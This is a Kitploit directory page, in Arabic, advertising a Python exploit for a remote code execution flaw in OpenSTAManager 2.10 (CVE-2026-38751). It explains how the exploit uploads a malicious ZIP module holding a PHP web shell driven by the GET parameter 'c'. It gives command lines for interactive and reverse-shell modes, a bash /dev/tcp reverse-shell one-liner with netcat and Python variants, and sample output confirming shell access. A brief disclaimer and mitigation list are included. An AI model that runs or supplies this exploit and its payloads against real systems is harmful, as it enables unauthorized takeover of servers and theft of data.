Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
OpenSTAManager_RCE_Exploit-CVE-2026-38751- — استغلال تنفيذ التعليمات البرمجية عن بُعد في OpenSTAManager (CVE-2026-38751) | Kitploit
أدوات/GitHubGitHub/hackthem
/openstamanager_rce_exploit-cve-2026-38751-
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعدتوليد شيفرة القشرة
GitHubhackthem/openstamanager_rce_exploit-cve-2026-38751-

OpenSTAManager_RCE_Exploit-CVE-2026-38751-

استغلال تنفيذ التعليمات البرمجية عن بُعد في OpenSTAManager (CVE-2026-38751)

عرض المستودع
119منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال OpenSTAManager للتنفيذ عن بُعد (RCE) (CVE-2026-38751)

نظرة عامة

يستغل هذا السكربت المكتوب بلغة Python ثغرة تنفيذ الأكواد عن بُعد (Remote Code Execution) في OpenSTAManager الإصدار 2.10، والمعروفة بـ CVE-2026-38751. يسمح هذا الاستغلال للمستخدمين المصادَق عليهم برفع وحدة خبيثة وتنفيذ أوامر تعسفية على النظام المستهدف.

تفاصيل الثغرة

  • معرف CVE: CVE-2026-38751
  • المنتج: OpenSTAManager
  • الإصدار: 2.10
  • النوع: تنفيذ الأكواد عن بُعد (RCE)
  • ناقل الهجوم: قائم على الويب، ويتطلب مصادقة صالحة

كيف يعمل الاستغلال

يتبع الاستغلال الخطوات التالية:

  1. المصادقة: تسجيل الدخول إلى تطبيق OpenSTAManager باستخدام بيانات الاعتماد المقدَّمة
  2. تفعيل التحديثات: تفعيل وظيفة تحديث الوحدات المطلوبة للاستغلال
  3. إنشاء ملف ZIP خبيث: يُنشئ ملف ZIP يحتوي على:
    • ملف تعريف وحدة (MODULE)
    • سكربت شل PHP (shell.php) ينفذ الأوامر عبر معامل GET باسم c
  4. رفع الوحدة: رفع ملف ZIP الخبيث عبر واجهة تحديث الوحدات
  5. التحقق من الاستغلال: التأكد من أن الشل قابل للوصول ويعمل بشكل صحيح
  6. تنفيذ الأوامر: إما:
    • وضع شل تفاعلي لتنفيذ الأوامر يدويًا
    • اتصال شل عكسي لإنشاء اتصال دائم

المتطلبات الأساسية

  • Python 3.x
  • حزم Python المطلوبة: requests, zipfile
  • بيانات اعتماد إدارية صالحة لـ OpenSTAManager
  • وصول شبكي إلى النظام المستهدف

طريقة الاستخدام

الاستخدام الأساسي

python3 exploit.py -u http://target.com -U admin -P password

وضع الشل التفاعلي

python3 exploit.py -u http://target.com -U admin -P password --interactive

وضع الشل العكسي

python3 exploit.py -u http://target.com -U admin -P password --lhost 10.10.14.180 --lport 4444

الوسائط

الوسيطالوصف
-u, --urlعنوان URL الهدف (مطلوب)
-U, --userاسم المستخدم للمصادقة (مطلوب)
-P, --passwordكلمة المرور للمصادقة (مطلوب)
--interactiveالدخول إلى وضع الشل التفاعلي
--no-cleanupعدم إزالة ملفات الشل بعد التنفيذ
--lhostالمضيف المحلي للشل العكسي
--lportالمنفذ المحلي للشل العكسي

التفاصيل الفنية

عملية الاستغلال

  1. المصادقة: يرسل السكربت طلب تسجيل دخول إلى نقطة نهاية المصادقة في التطبيق
  2. تفعيل تحديث الوحدات: يرسل طلب POST لتفعيل وظيفة تحديث الوحدات
  3. إنشاء ملف ZIP: يُنشئ أرشيف ZIP يحتوي على:
    • shell/MODULE: ملف إعدادات الوحدة
    • shell/shell.php: ويب شل PHP ينفذ الأوامر المُمرَّرة عبر معامل GET باسم c
  4. عملية الرفع: يستخدم بيانات نموذج multipart لرفع ملف ZIP الخبيث إلى نقطة نهاية تحديث الوحدات
  5. التحقق: يختبر الشل المرفوع عن طريق تنفيذ أمر بسيط مثل id للتأكد من أنه يعمل
  6. تنفيذ الأوامر: إما توفير شل تفاعلي أو إنشاء اتصال شل عكسي

الحمولات المستخدمة

يحاول الاستغلال استخدام عدة حمولات للشل العكسي:

  • شل عكسي بـ Bash: bash -i >& /dev/tcp/{lhost}/{lport} 0>&1
  • شل عكسي بـ Python باستخدام اتصالات socket
  • حمولة Bash مشفرة بـ Base64
  • شل عكسي عبر Netcat

الاعتبارات الأمنية

⚠️ إخلاء مسؤولية: هذا الاستغلال مخصص للأغراض التعليمية واختبارات الأمان المصرح بها فقط.

تقييم المخاطر

تتيح هذه الثغرة:

  • تنفيذ أكواد تعسفية بصلاحيات مستخدم خادم الويب
  • احتمال تصعيد الصلاحيات
  • الوصول إلى البيانات الحساسة المخزنة على النظام
  • إمكانية الحركة الجانبية داخل الشبكة

التخفيف

للحماية من هذه الثغرة:

  1. تحديث OpenSTAManager إلى أحدث إصدار
  2. تنفيذ ضوابط مصادقة مناسبة
  3. تقييد إمكانيات رفع الملفات
  4. مراقبة الأنشطة المشبوهة
  5. تطبيق تقسيم الشبكة

مثال على المخرجات

[ OpenSTAManager RCE Exploit : ]

Target: http://target.com
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 200
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami

[*] Entering interactive mode...
cmd> whoami
www-data
cmd> exit

المراجع

  • مستودع GitHub
  • تفاصيل CVE

الترخيص

يُقدَّم هذا الاستغلال للأغراض التعليمية فقط. يُعد الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها أمرًا غير قانوني.

تنزيل الأداة